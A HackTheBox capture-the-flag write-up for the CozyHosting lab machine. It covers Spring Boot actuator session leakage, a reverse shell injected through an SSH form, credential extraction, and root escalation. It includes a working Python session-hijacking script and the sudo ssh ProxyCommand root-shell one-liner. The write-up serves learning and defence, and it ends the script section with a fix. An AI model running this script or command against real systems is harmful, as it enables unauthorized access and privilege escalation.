HackTheBox WriteUp - CozyHosting

In this post I describe my way through the HackTheBox machine CozyHosting.

Recon and Enumeration

First, add the given IP address to the /etc/hosts file so the box is reachable in the browser at http://cozyhosting.htb.

Dashboard

This dashboard is displayed once the IP has been added to your hosts file.

At the beginning of the recon phase I always scan the target with nmap. The result shows two open ports on the target: 22 and 80.

The open SSH port 22 is only interesting if we can guess a username and password combination, which is not a recommended approach at this stage of the box. So on to port 80, the classic HTTP port for web services. We already checked that the dashboard is available there, so let's scan the web app with dirsearch.

The scan returns a lot of results. What stands out is an HTTP 200 for /actuator. A quick Google search shows that this path belongs to the Spring Boot Actuator, which exposes management endpoints such as health, env and sessions.

Let's dig into that a little more. Enumerating the endpoints, /actuator/sessions can be fetched with curl and returns two entries with session IDs. Let's switch to Burp and replace our own session ID with the ones we found.

One of the session IDs worked and we got access to the admin dashboard.
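Scripting the session-hijack check described above, as an added example that is not part of the original writeup: it parses a /actuator/sessions response, presents each leaked ID as the session cookie, and reports which ones reach the admin page without being redirected to the login. Assumptions not shown on the page: the endpoint returns a JSON object mapping session IDs to usernames, the cookie is Spring's default JSESSIONID, the protected page is /admin, and the sample response body below is constructed.

```python
import json
import sys
import urllib.request
from urllib.error import HTTPError

# Constructed sample of what an exposed /actuator/sessions endpoint returns:
# a JSON object mapping session IDs to principal names. IDs and names are made up.
SAMPLE_SESSIONS_BODY = json.dumps({
    "9A3C1F8E2B7D4A6E5F1C0B9D8E7A6F5C": "alice",
    "1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A": "bob",
})


def parse_sessions(body: str) -> dict:
    """Return {session_id: principal} from the actuator response body.

    Assumes the map-shaped response (session ID -> username); anything else
    is rejected rather than guessed at.
    """
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("unexpected /actuator/sessions payload shape")
    return {str(sid): str(who) for sid, who in data.items()}


def cookie_header(session_id: str, cookie_name: str = "JSESSIONID") -> str:
    """Cookie header value that presents a stolen ID as our own session.
    JSESSIONID is Spring's default session cookie name (assumption)."""
    return f"{cookie_name}={session_id}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes a 3xx surface as HTTPError instead of being followed;
    # a redirect to /login is exactly the signal we want to see.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_status(url: str, session_id: str) -> int:
    """GET url with the session cookie; return the status code without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"Cookie": cookie_header(session_id)})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def find_valid_sessions(base_url: str, sessions: dict, status_fn=http_status,
                        path: str = "/admin") -> list:
    """Try every leaked session ID against the protected page (assumed /admin).

    Returns [(session_id, principal)] for IDs that answer 200; an expired or
    unprivileged session typically bounces to the login page instead.
    status_fn is injectable so the logic can be exercised offline.
    """
    target = base_url.rstrip("/") + path
    return [(sid, who) for sid, who in sessions.items()
            if status_fn(target, sid) == 200]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live use: python3 hijack.py http://cozyhosting.htb
        base = sys.argv[1]
        with urllib.request.urlopen(base.rstrip("/") + "/actuator/sessions", timeout=10) as r:
            body = r.read().decode()
        for sid, who in find_valid_sessions(base, parse_sessions(body)):
            print(f"[+] {who}: {cookie_header(sid)} reaches /admin")
    else:
        print(parse_sessions(SAMPLE_SESSIONS_BODY))
```

The server-side fix is not to expose the endpoint at all: restrict management.endpoints.web.exposure.include to health (or move the actuator to a management port bound to localhost) and put whatever remains behind authentication; sessions, env and heapdump all leak material of this kind.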

The dashboard is not that complex. Scrolling down, we see two input fields (Hostname and Username). Let's check what this form does in detail by intercepting the HTTP request with Burp and analysing the communication. As input I simply chose the value test.

As a result, the HTTP response contains an error message that the hostname test could not be resolved. This looks like an SSH error.

So the dashboard tries to establish an SSH connection with the values we supply. After some tests I got this payload to work. It is a reverse shell, base64 encoded.

Let's fire the payload and catch the reverse shell with a nc listener.

In order to make this request work, the spaces have to be written as shown in the HTTP request above.

Looking around on the box, we find a .jar file in the /app folder. With a Python SimpleHTTPServer I copied the .jar file over to my local Kali instance.

With jd-gui we can analyse .jar files, so let's install it locally and open the .jar.

In Spring applications a very interesting file is application.properties. Looking at it, we find credentials for a PostgreSQL database.

Let's connect to the PostgreSQL database on the CozyHosting host with the psql client (the user flag is an uppercase -U; psql prompts for the password from application.properties):

psql -h 127.0.0.1 -U postgres

Analysing the database, I found a user and an admin entry with their password hashes.

Copy the admin password hash to a file and run john against it to crack it.

Connect via SSH to the host using the username found in the database and the password john cracked.

Privilege Escalation

The priv-esc vector was simple this time. Run sudo -l to check for possible vectors.

It lists the ssh command as runnable with root privileges.

After a quick Google search I found this possible escalation on GTFOBins:

https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

That worked like a charm. ProxyCommand is executed through the user's shell, so the ';' starts a second command, and the redirections 0<&2 1>&2 attach the spawned sh to stderr, which is still our terminal; the x is just a dummy hostname. Running whoami verifies that we are root.

Yep, it worked!

Happy Hacking!
